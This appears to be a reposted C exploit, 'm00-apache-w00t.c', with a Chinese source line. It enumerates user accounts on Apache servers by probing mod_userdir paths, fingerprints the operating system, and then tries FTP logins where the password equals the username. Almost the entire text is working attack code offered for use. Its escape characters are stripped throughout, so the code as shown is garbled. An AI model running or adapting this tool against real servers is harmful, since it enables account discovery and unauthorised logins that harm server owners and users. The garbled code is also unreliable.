信息来源:
www.hk20.com复制内容到剪贴板
代码:
/* m00-apache-w00t.c
*
* Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
* ~ Proof-of-Concept edition ~
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* Works only against Linux and *BSD boxes.
* Info: [url]http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0065.html[/url]
* This is old, but curentlly still actual problem, because 99% of all admins use
* default configuration of apache http server.
*
* This is just proof-of-concept code. More powerful won't be published.
*
* Great collection of userlists u can find at:
* [url]http://packetstormsecurity.nl/Crackers/wordlists/names/[/url]
*
* Thanks to damned, rash and Akula // m00sec
*
* -d4rkgr3y // EFnet@m00sec // [url]www.m00.ru[/url]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define DEFAULT_HTTP_PORT 80
#define DEFAULT_FTP_PORT 21
int m00() {
printf("n
Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.nn");
}
int verbose(char *d) {
printf("+-----------------------o0o-----------------------+n");
printf("n%s",d);
printf("+-----------------------o0o-----------------------+n");
}
int usage(char *xplname) {
printf("[~] usage: %s -t <host> -u <userlist> [options]nn",xplname);
printf("Options:n");
printf("-p <port> - http port [80]n");
printf("-l <log_file> - log all attempts to filen");
printf("-b - try to log on ftp with guessed logins (public version only login:login)n");
printf("-h - usagen");
printf("n");
exit(0);
}
int attempt(char *argv);
int conn(char *ip, unsigned short port) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr=inet_addr(ip))==-1) {
if ((hs=gethostbyname(ip))==NULL) {
perror("[-] Error"); exit(0);
}
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("[-] Error"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("[-] Error "); exit(0);
}
return(sockfd);
}
int main(int argc, char *argv[]) {
FILE *userlist, *logfile;
char *file=NULL;
char *lfile=NULL;
char *host=NULL;
char buf[0x20], check[0x20], request[0xc8], answer[0x3e8], c,logd[0x30];
int i,hand,x,f,v=0,brute=0;
int port = DEFAULT_HTTP_PORT;
int fport = DEFAULT_FTP_PORT;
char c200[0x05] =
"x20x32x30x30x20";
char c403[0x0e] =
"x34x30x33x20x46x6f"
"x72x62x69x64x64x65x6e";
char c404[0x0e] =
"x34x30x34x20x4ex6fx74"
"x20x46x6fx75x6ex64";
char signature[0x0f] =
"x53x65x72x76x65x72x3a"
"x20x41x70x61x63x68x65";
char *http =
"Accept: */*rn"
"Accept-Language: en-us,en;q=0.5rn"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn"
"User-Agent: m00-apache-fingerrn"
"Connection: closernrn";
char **logz;
m00();
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:hp:vbl:"))!= EOF) {
switch (c) {
case 't':
host=optarg;
break;
case 'u':
file=optarg;
break;
case 'p':
port=atoi(optarg);
break;
case 'l':
lfile=optarg;
break;
case 'b':
brute=1;
break;
case 'v':
v=1;
break;
case 'h':
usage(argv[0]);
return 1;
default:
usage(argv[0]);
return 1;
}
}
if(host==NULL) { usage(argv[0]); }
if(file==NULL) { usage(argv[0]); }
if(lfile && (logfile = fopen(lfile, "a")) == 0) {
printf("[-] unable to open logfile [%s]n",lfile);
exit(0);
}
if((userlist = fopen(file, "r")) == 0) {
printf("[-] unable to open userlist [%s]n",file);
exit(0);
}
logz = (char **)malloc(0x666);
printf("
Checking http server [%s:%i]...n",host,port);
hand = conn(host,port);
sprintf(request,"HEAD /~root HTTP/1.1rnHost: %srn%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
printf(" Apache => ");
if(!strstr(answer,signature)) { printf(" non Vulnerable => "); } else printf(" yesn Vulnerable => ");
if(!strstr(answer,c403)) { printf("non[-] Exiting...n"); exit(0); } else printf("yesn");
close(hand);
hand = conn(host,port);
sprintf(request,"HEAD /~toor HTTP/1.1rnHost: %srn%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
printf(" OS => ");
if(strstr(answer,c403)) { printf("FreeBSD"); } else {
if(strstr(answer,"Unix")) printf("Unix unknow");
if(strstr(answer,"Debian")) printf("Debian Linux");
if(strstr(answer,"RedHat")) printf("RedHat Linux");
if(strstr(answer,"mdk")) printf("Mandrake Linux");
}
close(hand);
printf("n
Searching for system accounts...");
if(lfile) {
sprintf(logd,"Host: %snFound accounts:n",host);
fprintf(logfile,logd);
}
x=0;
f=0;
while (1) {
fgets(buf, 32, userlist);
if (buf[0] == 'n' || strstr(check,buf)) break;
strcpy(check,buf);
buf[strlen(buf)-1] = '';
x++;
printf("n %s =>",buf);
hand = conn(host,port);
sprintf(request,"HEAD /~%s HTTP/1.1rnHost: %srn%s",buf,host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(v) verbose(answer);
if(!strstr(answer,c404)) {
printf(" yes");
if(lfile) {
sprintf(logd,"%sn",buf);
fprintf(logfile,logd);
}
logz[f] = (char *)malloc(strlen(buf));
memcpy(logz[f],buf,strlen(buf));
memset(logz[f]+strlen(buf),0x0,1);
f++;
}
close(hand);
}
fclose(userlist);
printf("n
Searching complete.n");
printf(" %i users checkedn %i users foundn",x,f);
if(brute && f>0) {
x=0;
i=0;
if(lfile) {
sprintf(logd,"FTP:n");
fprintf(logfile,logd);
}
printf("
Attempting to log on ftp with login:login...n");
while(x!=f) {
printf(" %s:%s =>",logz[x],logz[x]);
hand = conn(host,fport);
sprintf(request,"USER %sn",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
sprintf(request,"PASS %sn",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(strstr(answer,"230")) {
printf(" yesn");
if(lfile) {
sprintf(logd,"%s:%sn",logz[x],logz[x]);
fprintf(logfile,logd);
}
i++;
} else printf(" non");
close(hand);
x++;
}
printf("
Complete.n");
printf(" %i ftp accounts foundn",i);
}
if(lfile) {
fprintf(logfile,"n");
fclose(logfile);
}
}
/* m00 */
